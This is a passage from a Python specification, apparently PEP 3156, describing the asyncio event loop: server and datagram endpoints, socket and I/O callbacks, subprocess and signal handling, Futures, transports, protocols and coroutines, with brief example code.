    • family, proto, flags: Address family, protocol and +flags to be passed through to getaddrinfo(). These all +default to 0, which means “not specified”. (The socket type +is always SOCK_STREAM.) If any of these values are not +specified, the getaddrinfo() method will choose appropriate +values. Note: proto has nothing to do with the high-level +Protocol concept or the protocol_factory argument.
    • +
    • sock: An optional socket to be used instead of using the +host, port, family, proto and flags +arguments. If this is given, host and port must be +explicitly set to None.
    • +
• local_addr: If given, a (host, port) tuple used to bind the socket locally. This is rarely needed, but on multi-homed servers you occasionally need to force a connection to come from a specific address. This is how you would do that. The host and port are looked up using getaddrinfo().
    • +
    • server_hostname: This is only relevant when using SSL/TLS; it +should not be used when ssl is not set. When ssl is set, +this sets or overrides the hostname that will be verified. By +default the value of the host argument is used. If host +is empty, there is no default and you must pass a value for +server_hostname. To disable hostname verification (which is a +serious security risk) you must pass an empty string here and pass +an ssl.SSLContext object whose verify_mode is set to +ssl.CERT_NONE as the ssl argument.
    • +
    +
  • +
  • create_server(protocol_factory, host, port, <options>). +Enters a serving loop that accepts connections. +This is a coroutine that completes once the serving loop is set up +to serve. The return value is a Server object which can be used +to stop the serving loop in a controlled fashion (see below). +Multiple sockets may be bound if the specified address allows +both IPv4 and IPv6 connections.

    Each time a connection is accepted, +protocol_factory is called without arguments(**) to create a +Protocol, a bidirectional stream Transport is created to represent +the network side of the connection, and the two are tied together by +calling protocol.connection_made(transport).

    +

    (**) See previous footnote for create_connection(). However, since +protocol_factory() is called once for each new incoming +connection, it should return a new Protocol object each time it is +called.

    +

    The <options> are all specified using optional keyword arguments:

    +
      +
    • ssl: Pass an ssl.SSLContext object (or an object with the +same interface) to override the default SSL context object to be +used. (Unlike for create_connection(), passing True does +not make sense here – the SSLContext object is needed to +specify the certificate and key.)
    • +
    • backlog: Backlog value to be passed to the listen() call. +The default is implementation-dependent; in the default +implementation the default value is 100.
    • +
    • reuse_address: Whether to set the SO_REUSEADDR option on +the socket. The default is True on UNIX, False on +Windows.
    • +
    • family, flags: Address family and flags to be passed +through to getaddrinfo(). The family defaults to +AF_UNSPEC; the flags default to AI_PASSIVE. (The socket +type is always SOCK_STREAM; the socket protocol always set to +0, to let getaddrinfo() choose.)
    • +
    • sock: An optional socket to be used instead of using the +host, port, family and flags arguments. If this +is given, host and port must be explicitly set to None.
    • +
    +
  • +
• create_datagram_endpoint(protocol_factory, local_addr=None, remote_addr=None, <options>). Creates an endpoint for sending and receiving datagrams (typically UDP packets). Because of the nature of datagram traffic, there are no separate calls to set up client and server side, since usually a single endpoint acts as both client and server. This is a coroutine that returns a (transport, protocol) pair on success, or raises an exception on failure. If the coroutine returns successfully, the transport will call callbacks on the protocol whenever a datagram is received or the socket is closed; it is up to the protocol to call methods on the transport to send datagrams. The transport returned is a DatagramTransport. The protocol returned is a DatagramProtocol. These are described later.

    Mandatory positional argument:

    +
      +
    • protocol_factory: A class or factory function that will be +called exactly once, without arguments, to construct the protocol +object to be returned. The interface between datagram transport +and protocol is described below.
    • +
    +

    Optional arguments that may be specified positionally or as keyword +arguments:

    +
      +
    • local_addr: An optional tuple indicating the address to which +the socket will be bound. If given this must be a (host, +port) pair. It will be passed to getaddrinfo() to be +resolved and the result will be passed to the bind() method of +the socket created. If getaddrinfo() returns more than one +address, they will be tried in turn. If omitted, no bind() +call will be made.
    • +
    • remote_addr: An optional tuple indicating the address to which +the socket will be “connected”. (Since there is no such thing as +a datagram connection, this just specifies a default value for the +destination address of outgoing datagrams.) If given this must be +a (host, port) pair. It will be passed to getaddrinfo() +to be resolved and the result will be passed to sock_connect() +together with the socket created. If getaddrinfo() returns +more than one address, they will be tried in turn. If omitted, +no sock_connect() call will be made.
    • +
    +

    The <options> are all specified using optional keyword arguments:

    +
      +
    • family, proto, flags: Address family, protocol and +flags to be passed through to getaddrinfo(). These all +default to 0, which means “not specified”. (The socket type +is always SOCK_DGRAM.) If any of these values are not +specified, the getaddrinfo() method will choose appropriate +values.
    • +
    +

    Note that if both local_addr and remote_addr are present, +all combinations of local and remote addresses with matching address +family will be tried.

    +
  • +
+
+
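Tying these pieces together, the EchoProtocol sketched in the Transports and Protocols section could be served like this (illustrative; error handling omitted):

import asyncio

loop = asyncio.new_event_loop()
# create_server() is a coroutine; run it to obtain the Server object.
server = loop.run_until_complete(
    loop.create_server(EchoProtocol, '127.0.0.1', 8888))
try:
    loop.run_forever()   # serve until stopped
finally:
    server.close()       # stop accepting new connections
    loop.run_until_complete(server.wait_closed())
    loop.close()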
+

Wrapped Socket Methods

+

The following methods for doing async I/O on sockets are not for +general use. They are primarily meant for transport implementations +working with IOCP through the ProactorEventLoop class. However, +they are easily implementable for other event loop types, so there is +no reason not to require them. The socket argument has to be a +non-blocking socket.

+
    +
  • sock_recv(sock, n). Receive up to n bytes from socket +sock. Returns a Future whose result on success will be a +bytes object.
  • +
  • sock_sendall(sock, data). Send bytes data to socket +sock. Returns a Future whose result on success will be +None. Note: the name uses sendall instead of send, to +reflect that the semantics and signature of this method echo those +of the standard library socket method sendall() rather than +send().
  • +
  • sock_connect(sock, address). Connect to the given address. +Returns a Future whose result on success will be None.
  • +
  • sock_accept(sock). Accept a connection from a socket. The +socket must be in listening mode and bound to an address. Returns a +Future whose result on success will be a tuple (conn, peer) +where conn is a connected non-blocking socket and peer is +the peer address.
  • +
+
+
+

I/O Callbacks

These methods are primarily meant for transport implementations working with a selector. They are implemented by SelectorEventLoop but not by ProactorEventLoop. Custom event loop implementations may or may not implement them.

The fd arguments below may be integer file descriptors, or “file-like” objects with a fileno() method that wrap integer file descriptors. Not all file-like objects or file descriptors are acceptable. Sockets (and socket file descriptors) are always accepted. On Windows no other types are supported. On UNIX, pipes and possibly tty devices are also supported, but disk files are not. Exactly which special file types are supported may vary by platform and per selector implementation. (Experimentally, there is at least one kind of pseudo-tty on OS X that is supported by select and poll but not by kqueue: it is used by Emacs shell windows.)

• add_reader(fd, callback, *args). Arrange for callback(*args) to be called whenever file descriptor fd is deemed ready for reading. Calling add_reader() again for the same file descriptor implies a call to remove_reader() for the same file descriptor.

• add_writer(fd, callback, *args). Like add_reader(), but registers the callback for writing instead of for reading.

• remove_reader(fd). Cancels the current read callback for file descriptor fd, if one is set. If no callback is currently set for the file descriptor, this is a no-op and returns False. Otherwise, it removes the callback arrangement and returns True.

• remove_writer(fd). This is to add_writer() as remove_reader() is to add_reader().
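A sketch of reading with these callbacks, assuming sock is an already-connected non-blocking socket and loop is a selector-based event loop:

    def on_readable():
        data = sock.recv(4096)
        if not data:  # EOF: unregister the callback and close
            loop.remove_reader(sock.fileno())
            sock.close()
        else:
            print('received', data)

    loop.add_reader(sock.fileno(), on_readable)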

Pipes and Subprocesses

These methods are supported by SelectorEventLoop on UNIX and ProactorEventLoop on Windows.

The transports and protocols used with pipes and subprocesses differ from those used with regular stream connections. These are described later.

Each of the methods below has a protocol_factory argument, similar to create_connection(); this will be called exactly once, without arguments, to construct the protocol object to be returned.

Each method is a coroutine that returns a (transport, protocol) pair on success, or raises an exception on failure.

• connect_read_pipe(protocol_factory, pipe): Create a unidirectional stream connection from a file-like object wrapping the read end of a UNIX pipe, which must be in non-blocking mode. The transport returned is a ReadTransport.

• connect_write_pipe(protocol_factory, pipe): Create a unidirectional stream connection from a file-like object wrapping the write end of a UNIX pipe, which must be in non-blocking mode. The transport returned is a WriteTransport; it does not have any read-related methods. The protocol returned is a BaseProtocol.

• subprocess_shell(protocol_factory, cmd, <options>): Create a subprocess from cmd, which is a string using the platform’s “shell” syntax. This is similar to the standard library subprocess.Popen() class called with shell=True. The remaining arguments and return value are described below.

• subprocess_exec(protocol_factory, *args, <options>): Create a subprocess from one or more string arguments, where the first string specifies the program to execute, and the remaining strings specify the program’s arguments. (Thus, together the string arguments form the sys.argv value of the program, assuming it is a Python script.) This is similar to the standard library subprocess.Popen() class called with shell=False and the list of strings passed as the first argument; however, where Popen() takes a single argument which is a list of strings, subprocess_exec() takes multiple string arguments. The remaining arguments and return value are described below.

Apart from the way the program to execute is specified, the two subprocess_*() methods behave the same. The transport returned is a SubprocessTransport which has a different interface than the common bidirectional stream transport. The protocol returned is a SubprocessProtocol which also has a custom interface.

The <options> are all specified using optional keyword arguments:

• stdin: Either a file-like object representing the pipe to be connected to the subprocess’s standard input stream using connect_write_pipe(), or the constant subprocess.PIPE (the default). By default a new pipe will be created and connected.

• stdout: Either a file-like object representing the pipe to be connected to the subprocess’s standard output stream using connect_read_pipe(), or the constant subprocess.PIPE (the default). By default a new pipe will be created and connected.

• stderr: Either a file-like object representing the pipe to be connected to the subprocess’s standard error stream using connect_read_pipe(), or one of the constants subprocess.PIPE (the default) or subprocess.STDOUT. By default a new pipe will be created and connected. When subprocess.STDOUT is specified, the subprocess’s standard error stream will be connected to the same pipe as the standard output stream.

• bufsize: The buffer size to be used when creating a pipe; this is passed to subprocess.Popen(). In the default implementation this defaults to zero, and on Windows it must be zero; these defaults deviate from subprocess.Popen().

• executable, preexec_fn, close_fds, cwd, env, startupinfo, creationflags, restore_signals, start_new_session, pass_fds: These optional arguments are passed to subprocess.Popen() without interpretation.
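A sketch of launching a subprocess with subprocess_exec(). MySubprocessProtocol stands in for a SubprocessProtocol implementation (see the “Subprocess Protocol” section below), and the done Future is an assumed convention of that hypothetical protocol, not part of the specified API:

    @asyncio.coroutine
    def run_ls(loop):
        transport, protocol = yield from loop.subprocess_exec(
            MySubprocessProtocol, 'ls', '-l')  # stdin/stdout/stderr: new pipes
        yield from protocol.done  # assumed: protocol sets this in process_exited()
        return transport.get_returncode()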

Signal callbacks

These methods are only supported on UNIX.

• add_signal_handler(sig, callback, *args). Whenever signal sig is received, arrange for callback(*args) to be called. Specifying another callback for the same signal replaces the previous handler (only one handler can be active per signal). The sig must be a valid signal number defined in the signal module. If the signal cannot be handled this raises an exception: ValueError if it is not a valid signal or if it is an uncatchable signal (e.g. SIGKILL), RuntimeError if this particular event loop instance cannot handle signals (since signals are global per process, only an event loop associated with the main thread can handle signals).

• remove_signal_handler(sig). Removes the handler for signal sig, if one is set. Raises the same exceptions as add_signal_handler() (except that it may return False instead of raising RuntimeError for uncatchable signals). Returns True if a handler was removed successfully, False if no handler was set.

Note: If these methods are statically known to be unsupported, they may raise NotImplementedError instead of RuntimeError.
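For example, a loop running in the main thread can install a SIGINT handler like this:

    import signal

    def on_sigint():
        print('got SIGINT, stopping the loop')
        loop.stop()

    loop.add_signal_handler(signal.SIGINT, on_sigint)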


Mutual Exclusion of Callbacks

An event loop should enforce mutual exclusion of callbacks, i.e. it should never start a callback while a previous callback is still running. This should apply across all types of callbacks, regardless of whether they are scheduled using call_soon(), call_later(), call_at(), call_soon_threadsafe(), add_reader(), add_writer(), or add_signal_handler().


Exceptions

There are two categories of exceptions in Python: those that derive from the Exception class and those that derive from BaseException. Exceptions deriving from Exception will generally be caught and handled appropriately; for example, they will be passed through by Futures, and they will be logged and ignored when they occur in a callback.

However, exceptions deriving only from BaseException are typically not caught, and will usually cause the program to terminate with a traceback. In some cases they are caught and re-raised. (Examples of this category include KeyboardInterrupt and SystemExit; it is usually unwise to treat these the same as most other exceptions.)

The event loop passes the former category into its exception handler. This is a callback which accepts a context dict as a parameter:

    def exception_handler(context):
        ...

context may have many different keys, but several of them are very widely used:

• 'message': error message.

• 'exception': exception instance; None if there is no exception.

• 'source_traceback': a list of strings representing the stack at the point the object involved in the error was created.

• 'handle_traceback': a list of strings representing the stack at the moment the handle involved in the error was created.
The loop has the following methods related to exception handling:

• get_exception_handler() returns the current exception handler registered for the loop.

• set_exception_handler(handler) sets the exception handler.

• default_exception_handler(context) is the default exception handler for this loop implementation.

• call_exception_handler(context) passes context into the registered exception handler. This allows third-party libraries to handle uncaught exceptions uniformly.

The loop uses default_exception_handler() if the default was not overridden by an explicit set_exception_handler() call.
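A sketch of a custom handler that delegates to the default one and then reacts to a particular exception type; the reconnect logic is left as a placeholder:

    def my_exception_handler(context):
        loop.default_exception_handler(context)  # keep the default logging
        exc = context.get('exception')
        if isinstance(exc, ConnectionError):
            ...  # e.g. schedule a reconnect attempt

    loop.set_exception_handler(my_exception_handler)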


Debug Mode

By default the loop operates in release mode. Applications may enable debug mode for better error reporting at the cost of some performance.

In debug mode many additional checks are enabled, for example:

• Source tracebacks are available for unhandled exceptions in futures/tasks.

• The loop checks for slow callbacks to detect accidental blocking on I/O.

  The loop.slow_callback_duration attribute controls the maximum execution time allowed between two yield points before a slow callback is reported. The default value is 0.1 seconds; it may be changed by assigning to it.

There are two methods related to debug mode:

• get_debug() returns True if debug mode is enabled, False otherwise.

• set_debug(enabled) enables debug mode if the argument is True.

Debug mode is automatically enabled if the PYTHONASYNCIODEBUG environment variable is defined and not empty.
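For example, to enable debug mode programmatically and tighten the slow-callback threshold:

    loop.set_debug(True)
    loop.slow_callback_duration = 0.05  # report callbacks running longer than 50 ms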


Handles

The various methods for registering one-off callbacks (call_soon(), call_later(), call_at() and call_soon_threadsafe()) all return an object representing the registration that can be used to cancel the callback. This object is called a Handle. Handles are opaque and have only one public method:

• cancel(): Cancel the callback.

Note that add_reader(), add_writer() and add_signal_handler() do not return Handles.
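For example, a timeout that may be cancelled before it fires (on_timeout is a placeholder callback):

    handle = loop.call_later(30.0, on_timeout)
    ...
    handle.cancel()  # the timeout is no longer needed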


Servers

The create_server() method returns a Server instance, which wraps the sockets (or other network objects) used to accept requests. This class has two public methods:

• close(): Close the service. This stops accepting new requests but does not cancel requests that have already been accepted and are currently being handled.

• wait_closed(): A coroutine that blocks until the service is closed and all accepted requests have been handled.
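A sketch of a server that accepts connections for a while and then shuts down cleanly; MyProtocol is a placeholder protocol factory:

    @asyncio.coroutine
    def serve_briefly(loop):
        server = yield from loop.create_server(MyProtocol, '127.0.0.1', 8000)
        yield from asyncio.sleep(60)     # accept requests for a minute
        server.close()                   # stop accepting new requests
        yield from server.wait_closed()  # wait for accepted requests to finish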

Futures

The asyncio.Future class here is intentionally similar to the concurrent.futures.Future class specified by PEP 3148, but there are slight differences. Whenever this PEP talks about Futures or futures this should be understood to refer to asyncio.Future unless concurrent.futures.Future is explicitly mentioned. The supported public API is as follows, indicating the differences with PEP 3148:

• cancel(). If the Future is already done (or cancelled), do nothing and return False. Otherwise, this attempts to cancel the Future and returns True. If the cancellation attempt is successful, eventually the Future’s state will change to cancelled (so that cancelled() will return True) and the callbacks will be scheduled. For regular Futures, cancellation will always succeed immediately; but for Tasks (see below) the task may ignore or delay the cancellation attempt.

• cancelled(). Returns True if the Future was successfully cancelled.

• done(). Returns True if the Future is done. Note that a cancelled Future is considered done too (here and everywhere).

• result(). Returns the result set with set_result(), or raises the exception set with set_exception(). Raises CancelledError if cancelled. Difference with PEP 3148: This has no timeout argument and does not wait; if the future is not yet done, it raises an exception.

• exception(). Returns the exception if set with set_exception(), or None if a result was set with set_result(). Raises CancelledError if cancelled. Difference with PEP 3148: This has no timeout argument and does not wait; if the future is not yet done, it raises an exception.

• add_done_callback(fn). Add a callback to be run when the Future becomes done (or is cancelled). If the Future is already done (or cancelled), schedules the callback using call_soon(). Difference with PEP 3148: The callback is never called immediately, and always in the context of the caller – typically this is a thread. You can think of this as calling the callback through call_soon(). Note that in order to match PEP 3148, the callback (unlike all other callbacks defined in this PEP, and ignoring the convention from the section “Callback Style” below) is always called with a single argument, the Future object. (The motivation for strictly serializing callbacks scheduled with call_soon() applies here too.)

• remove_done_callback(fn). Remove the argument from the list of callbacks. This method is not defined by PEP 3148. The argument must be equal (using ==) to the argument passed to add_done_callback(). Returns the number of times the callback was removed.

• set_result(result). The Future must not be done (nor cancelled) already. This makes the Future done and schedules the callbacks. Difference with PEP 3148: This is a public API.

• set_exception(exception). The Future must not be done (nor cancelled) already. This makes the Future done and schedules the callbacks. Difference with PEP 3148: This is a public API.
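A small sketch tying these pieces together; the done callback is scheduled with call_soon() once the result is set:

    fut = asyncio.Future()

    def on_done(f):
        print('result:', f.result())

    fut.add_done_callback(on_done)      # called via call_soon(), never immediately
    loop.call_soon(fut.set_result, 42)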
The internal method set_running_or_notify_cancel() is not supported; there is no way to set the running state. Likewise, the method running() is not supported.

The following exceptions are defined:

• InvalidStateError. Raised whenever the Future is not in a state acceptable to the method being called (e.g. calling set_result() on a Future that is already done, or calling result() on a Future that is not yet done).

• InvalidTimeoutError. Raised by result() and exception() when a nonzero timeout argument is given.

• CancelledError. An alias for concurrent.futures.CancelledError. Raised when result() or exception() is called on a Future that is cancelled.

• TimeoutError. An alias for concurrent.futures.TimeoutError. May be raised by run_until_complete().

A Future is associated with an event loop when it is created.

An asyncio.Future object is not acceptable to the wait() and as_completed() functions in the concurrent.futures package. However, there are similar APIs asyncio.wait() and asyncio.as_completed(), described below.

An asyncio.Future object is acceptable to a yield from expression when used in a coroutine. This is implemented through the __iter__() interface on the Future. See the section “Coroutines and the Scheduler” below.

When a Future is garbage-collected, if it has an associated exception but neither result() nor exception() has ever been called, the exception is logged. (When a coroutine uses yield from to wait for a Future, that Future’s result() method is called once the coroutine is resumed.)

In the future (pun intended) we may unify asyncio.Future and concurrent.futures.Future, e.g. by adding an __iter__() method to the latter that works with yield from. To prevent accidentally blocking the event loop by calling e.g. result() on a Future that’s not done yet, the blocking operation may detect that an event loop is active in the current thread and raise an exception instead. However the current PEP strives to have no dependencies beyond Python 3.3, so changes to concurrent.futures.Future are off the table for now.

There are some public functions related to Futures:

• asyncio.async(arg). This takes an argument that is either a coroutine object or a Future (i.e., anything you can use with yield from) and returns a Future. If the argument is a Future, it is returned unchanged; if it is a coroutine object, it wraps it in a Task (remember that Task is a subclass of Future).

• asyncio.wrap_future(future). This takes a PEP 3148 Future (i.e., an instance of concurrent.futures.Future) and returns a Future compatible with the event loop (i.e., an asyncio.Future instance).

Transports

Transports and protocols are strongly influenced by Twisted and PEP 3153. Users rarely implement or instantiate transports – rather, event loops offer utility methods to set up transports.

Transports work in conjunction with protocols. Protocols are typically written without knowing or caring about the exact type of transport used, and transports can be used with a wide variety of protocols. For example, an HTTP client protocol implementation may be used with either a plain socket transport or an SSL/TLS transport. The plain socket transport can be used with many different protocols besides HTTP (e.g. SMTP, IMAP, POP, FTP, IRC, SPDY).

The most common type of transport is a bidirectional stream transport. There are also unidirectional stream transports (used for pipes) and datagram transports (used by the create_datagram_endpoint() method).


Methods For All Transports

• get_extra_info(name, default=None). This is a catch-all method that returns implementation-specific information about a transport. The first argument is the name of the extra field to be retrieved. The optional second argument is a default value to be returned. Consult the implementation documentation to find out the supported extra field names. For an unsupported name, the default is always returned.

Bidirectional Stream Transports

A bidirectional stream transport is an abstraction on top of a socket or something similar (for example, a pair of UNIX pipes or an SSL/TLS connection).

Most connections have an asymmetric nature: the client and server usually have very different roles and behaviors. Hence, the interface between transport and protocol is also asymmetric. From the protocol’s point of view, writing data is done by calling the write() method on the transport object; this buffers the data and returns immediately. However, the transport takes a more active role in reading data: whenever some data is read from the socket (or other data source), the transport calls the protocol’s data_received() method.

Nevertheless, the interface between transport and protocol used by bidirectional streams is the same for clients as it is for servers, since the connection between a client and a server is essentially a pair of streams, one in each direction.

Bidirectional stream transports have the following public methods:

• write(data). Write some bytes. The argument must be a bytes object. Returns None. The transport is free to buffer the bytes, but it must eventually cause the bytes to be transferred to the entity at the other end, and it must maintain stream behavior. That is, t.write(b'abc'); t.write(b'def') is equivalent to t.write(b'abcdef'), as well as to:

      t.write(b'a')
      t.write(b'b')
      t.write(b'c')
      t.write(b'd')
      t.write(b'e')
      t.write(b'f')

• writelines(iterable). Equivalent to:

      for data in iterable:
          self.write(data)

• write_eof(). Close the writing end of the connection. Subsequent calls to write() are not allowed. Once all buffered data is transferred, the transport signals to the other end that no more data will be received. Some protocols don’t support this operation; in that case, calling write_eof() will raise an exception. (Note: This used to be called half_close(), but unless you already know what it is for, that name doesn’t indicate which end is closed.)

• can_write_eof(). Return True if the protocol supports write_eof(), False if it does not. (This method typically returns a fixed value that depends only on the specific Transport class, not on the state of the Transport object. It is needed because some protocols need to change their behavior when write_eof() is unavailable. For example, in HTTP, to send data whose size is not known ahead of time, the end of the data is typically indicated using write_eof(); however, SSL/TLS does not support this, and an HTTP protocol implementation would have to use the “chunked” transfer encoding in this case. But if the data size is known ahead of time, the best approach in both cases is to use the Content-Length header.)

• get_write_buffer_size(). Return the current size of the transport’s write buffer in bytes. This only knows about the write buffer managed explicitly by the transport; buffering in other layers of the network stack or elsewhere in the network is not reported.

• set_write_buffer_limits(high=None, low=None). Set the high- and low-water limits for flow control.

  These two values control when to call the protocol’s pause_writing() and resume_writing() methods. If specified, the low-water limit must be less than or equal to the high-water limit. Neither value can be negative.

  The defaults are implementation-specific. If only the high-water limit is given, the low-water limit defaults to an implementation-specific value less than or equal to the high-water limit. Setting high to zero forces low to zero as well, and causes pause_writing() to be called whenever the buffer becomes non-empty. Setting low to zero causes resume_writing() to be called only once the buffer is empty. Use of zero for either limit is generally sub-optimal as it reduces opportunities for doing I/O and computation concurrently.

• pause_reading(). Suspend delivery of data to the protocol until a subsequent resume_reading() call. Between pause_reading() and resume_reading(), the protocol’s data_received() method will not be called.

• resume_reading(). Restart delivery of data to the protocol via data_received(). Note that “paused” is a binary state – pause_reading() should only be called when the transport is not paused, while resume_reading() should only be called when the transport is paused.

• close(). Sever the connection with the entity at the other end. Any data buffered by write() will (eventually) be transferred before the connection is actually closed. The protocol’s data_received() method will not be called again. Once all buffered data has been flushed, the protocol’s connection_lost() method will be called with None as the argument. Note that this method does not wait for all that to happen.

• abort(). Immediately sever the connection. Any data still buffered by the transport is thrown away. Soon, the protocol’s connection_lost() method will be called with None as argument.
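A sketch of typical use, assuming transport is a connected bidirectional stream transport:

    transport.set_write_buffer_limits(high=64 * 1024, low=16 * 1024)
    transport.write(b'hello, ')
    transport.write(b'world\n')    # stream semantics: same as a single write
    if transport.can_write_eof():
        transport.write_eof()      # signal end-of-data if the protocol allows it
    else:
        transport.close()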

Unidirectional Stream Transports

A writing stream transport supports the write(), writelines(), write_eof(), can_write_eof(), close() and abort() methods described for bidirectional stream transports.

A reading stream transport supports the pause_reading(), resume_reading() and close() methods described for bidirectional stream transports.

A writing stream transport calls only connection_made() and connection_lost() on its associated protocol.

A reading stream transport can call all protocol methods specified in the Protocols section below (i.e., the previous two plus data_received() and eof_received()).


Datagram Transports

Datagram transports have these methods:

• sendto(data, addr=None). Sends a datagram (a bytes object). The optional second argument is the destination address. If omitted, remote_addr must have been specified in the create_datagram_endpoint() call that created this transport. If present, and remote_addr was specified, they must match. The (data, addr) pair may be sent immediately or buffered. The return value is None.

• abort(). Immediately close the transport. Buffered data will be discarded.

• close(). Close the transport. Buffered data will be transmitted asynchronously.

Datagram transports call the following methods on the associated protocol object: connection_made(), connection_lost(), error_received() and datagram_received(). (“Connection” in these method names is a slight misnomer, but the concepts still exist: connection_made() means the transport representing the endpoint has been created, and connection_lost() means the transport is closed.)


Subprocess Transports

Subprocess transports have the following methods:

• get_pid(). Return the process ID of the subprocess.

• get_returncode(). Return the process return code, if the process has exited; otherwise None.

• get_pipe_transport(fd). Return the pipe transport (a unidirectional stream transport) corresponding to the argument, which should be 0, 1 or 2 representing stdin, stdout or stderr (of the subprocess). If there is no such pipe transport, return None. For stdin, this is a writing transport; for stdout and stderr this is a reading transport. You must use this method to get a transport you can use to write to the subprocess’s stdin.

• send_signal(signal). Send a signal to the subprocess.

• terminate(). Terminate the subprocess.

• kill(). Kill the subprocess. On Windows this is an alias for terminate().

• close(). This is an alias for terminate().

Note that send_signal(), terminate() and kill() wrap the corresponding methods in the standard library subprocess module.


Protocols

Protocols are always used in conjunction with transports. While a few common protocols are provided (e.g. decent though not necessarily excellent HTTP client and server implementations), most protocols will be implemented by user code or third-party libraries.

Like for transports, we distinguish between stream protocols, datagram protocols, and perhaps other custom protocols. The most common type of protocol is a bidirectional stream protocol. (There are no unidirectional protocols.)


Stream Protocols

A (bidirectional) stream protocol must implement the following methods, which will be called by the transport. Think of these as callbacks that are always called by the event loop in the right context. (See the “Context” section way above.)

• connection_made(transport). Indicates that the transport is ready and connected to the entity at the other end. The protocol should probably save the transport reference as an instance variable (so it can call its write() and other methods later), and may write an initial greeting or request at this point.

• data_received(data). The transport has read some bytes from the connection. The argument is always a non-empty bytes object. There are no guarantees about the minimum or maximum size of the data passed along this way. p.data_received(b'abcdef') should be treated as exactly equivalent to:

      p.data_received(b'abc')
      p.data_received(b'def')

• eof_received(). This is called when the other end called write_eof() (or something equivalent). If this returns a false value (including None), the transport will close itself. If it returns a true value, closing the transport is up to the protocol. However, for SSL/TLS connections this is ignored, because the TLS standard requires that no more data is sent and the connection is closed as soon as a “closure alert” is received.

  The default implementation returns None.

• pause_writing(). Asks that the protocol temporarily stop writing data to the transport. Heeding the request is optional, but the transport’s buffer may grow without bounds if you keep writing. The buffer size at which this is called can be controlled through the transport’s set_write_buffer_limits() method.

• resume_writing(). Tells the protocol that it is safe to start writing data to the transport again. Note that this may be called directly by the transport’s write() method (as opposed to being called indirectly using call_soon()), so that the protocol may be aware of its paused state immediately after write() returns.

• connection_lost(exc). The transport has been closed or aborted, has detected that the other end has closed the connection cleanly, or has encountered an unexpected error. In the first three cases the argument is None; for an unexpected error, the argument is the exception that caused the transport to give up.

Here is a table indicating the order and multiplicity of the basic calls:

1. connection_made() – exactly once
2. data_received() – zero or more times
3. eof_received() – at most once
4. connection_lost() – exactly once

Calls to pause_writing() and resume_writing() occur in pairs and only between #1 and #4. These pairs will not be nested. The final resume_writing() call may be omitted; i.e. a paused connection may be lost and never be resumed.
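Putting the callbacks together, a minimal echo protocol might look like this; asyncio.Protocol provides default no-op implementations to inherit from:

    import asyncio

    class EchoProtocol(asyncio.Protocol):
        def connection_made(self, transport):
            self.transport = transport

        def data_received(self, data):
            self.transport.write(data)  # echo the bytes straight back

        def eof_received(self):
            return False  # false value: let the transport close itself

        def connection_lost(self, exc):
            pass  # exc is None for a clean close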


Datagram Protocols

Datagram protocols have connection_made() and connection_lost() methods with the same signatures as stream protocols. (As explained in the section about datagram transports, we prefer the slightly odd nomenclature over defining different method names to indicate the opening and closing of the socket.)

In addition, they have the following methods:

• datagram_received(data, addr). Indicates that a datagram data (a bytes object) was received from remote address addr (an IPv4 2-tuple or an IPv6 4-tuple).

• error_received(exc). Indicates that a send or receive operation raised an OSError exception. Since datagram errors may be transient, it is up to the protocol to call the transport’s close() method if it wants to close the endpoint.

Here is a chart indicating the order and multiplicity of calls:

1. connection_made() – exactly once
2. datagram_received(), error_received() – zero or more times
3. connection_lost() – exactly once

Subprocess Protocol

Subprocess protocols have connection_made(), connection_lost(), pause_writing() and resume_writing() methods with the same signatures as stream protocols. In addition, they have the following methods:

• pipe_data_received(fd, data). Called when the subprocess writes data to its stdout or stderr. fd is the file descriptor (1 for stdout, 2 for stderr). data is a bytes object.

• pipe_connection_lost(fd, exc). Called when the subprocess closes its stdin, stdout or stderr. fd is the file descriptor. exc is an exception or None.

• process_exited(). Called when the subprocess has exited. To retrieve the exit status, use the transport’s get_returncode() method.

Note that depending on the behavior of the subprocess it is possible that process_exited() is called either before or after pipe_connection_lost(). For example, if the subprocess creates a sub-subprocess that shares its stdin/stdout/stderr and then itself exits, process_exited() may be called while all the pipes are still open. On the other hand, when the subprocess closes its stdin/stdout/stderr but does not exit, pipe_connection_lost() may be called for all three pipes without process_exited() being called. If (as is the more common case) the subprocess exits and thereby implicitly closes all pipes, the calling order is undefined.


Callback Style

Most interfaces taking a callback also take positional arguments. For instance, to arrange for foo("abc", 42) to be called soon, you call loop.call_soon(foo, "abc", 42). To schedule the call foo(), use loop.call_soon(foo). This convention greatly reduces the number of small lambdas required in typical callback programming.

This convention specifically does not support keyword arguments. Keyword arguments are used to pass optional extra information about the callback. This allows graceful evolution of the API without having to worry about whether a keyword might be significant to a callee somewhere. If you have a callback that must be called with a keyword argument, you can use a lambda. For example:

    loop.call_soon(lambda: foo('abc', repeat=42))

Coroutines and the Scheduler

This is a separate toplevel section because its status is different from the event loop interface. Usage of coroutines is optional, and it is perfectly fine to write code using callbacks only. On the other hand, there is only one implementation of the scheduler/coroutine API, and if you’re using coroutines, that’s the one you’re using.


Coroutines

A coroutine is a generator that follows certain conventions. For documentation purposes, all coroutines should be decorated with @asyncio.coroutine, but this cannot be strictly enforced.

Coroutines use the yield from syntax introduced in PEP 380, instead of the original yield syntax.

The word “coroutine”, like the word “generator”, is used for two different (though related) concepts:

• The function that defines a coroutine (a function definition decorated with asyncio.coroutine). If disambiguation is needed we will call this a coroutine function.

• The object obtained by calling a coroutine function. This object represents a computation or an I/O operation (usually a combination) that will complete eventually. If disambiguation is needed we will call it a coroutine object.

Things a coroutine can do:

• result = yield from future – suspends the coroutine until the future is done, then returns the future’s result, or raises an exception, which will be propagated. (If the future is cancelled, it will raise a CancelledError exception.) Note that tasks are futures, and everything said about futures also applies to tasks.

• result = yield from coroutine – wait for another coroutine to produce a result (or raise an exception, which will be propagated). The coroutine expression must be a call to another coroutine.

• return expression – produce a result to the coroutine that is waiting for this one using yield from.

• raise exception – raise an exception in the coroutine that is waiting for this one using yield from.

Calling a coroutine does not start its code running – it is just a generator, and the coroutine object returned by the call is really a generator object, which doesn’t do anything until you iterate over it. In the case of a coroutine object, there are two basic ways to start it running: call yield from coroutine from another coroutine (assuming the other coroutine is already running!), or convert it to a Task (see below).

Coroutines (and tasks) can only run when the event loop is running.
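A minimal sketch of the two coroutine roles described above:

    import asyncio

    @asyncio.coroutine
    def compute(x):
        yield from asyncio.sleep(0.1)    # stand-in for real I/O
        return x * 2

    @asyncio.coroutine
    def main():
        result = yield from compute(21)  # suspends until compute() finishes
        print(result)                    # prints 42

    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())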


Waiting for Multiple Coroutines

To wait for multiple coroutines or Futures, two APIs similar to the wait() and as_completed() APIs in the concurrent.futures package are provided:

